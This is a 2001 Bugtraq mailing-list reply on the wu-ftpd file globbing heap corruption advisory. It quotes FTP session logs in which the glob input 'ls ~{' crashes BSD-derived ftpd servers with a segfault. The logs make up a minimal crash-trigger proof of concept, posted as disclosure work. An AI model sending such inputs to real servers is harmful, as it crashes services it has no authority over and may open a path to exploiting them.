Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability
From: GiulioMaria Fontana (fontana@datawell.it)
Date: 11/29/01
- In reply to: script0r: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
From: GiulioMaria Fontana <fontana@datawell.it>
To: <bugtraq@securityfocus.com>
Subject: Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability
Date: Thu, 29 Nov 2001 11:53:44 +0100
Message-Id: <20011129105345.83F4B42F70@psycho.sinapsi.net.com>
At 00:36 on Thursday, 29 November 2001, script0r wrote:
> I am running a linux port of the bsd ftpd and it might be vulnerable to
> a similar attack,
>
> ftp localhost
> Connected to localhost.
> 220 playlandFTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.
> Name (localhost:user): ftp
> 331 Guest login ok, type your name as password.
> Password:
> 230 Guest login ok, access restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls ~{
> 200 PORT command successful.
> 421 Service not available, remote server has closed connection
>
> in inetd I find an error stating that the ftpd process has died unexpectedly
>
> Nov 28 14:21:28 playland inetd[82]: pid 16341: exit signal 11
[psycho@psycho 11/29/01/gio psycho]> ftp urano
Connected to urano.xxx.xxx
220 urano.xxx.xxx FTP server (Version 6.5.5 VFTPD, based on Version
6.5/OpenBSD) ready.
Name (urano:psycho): gmfontana
331 Password required for gmfontana.
Password:
230 User gmfontana logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
421 Service not available, remote server has closed connection
ftp>
Giulio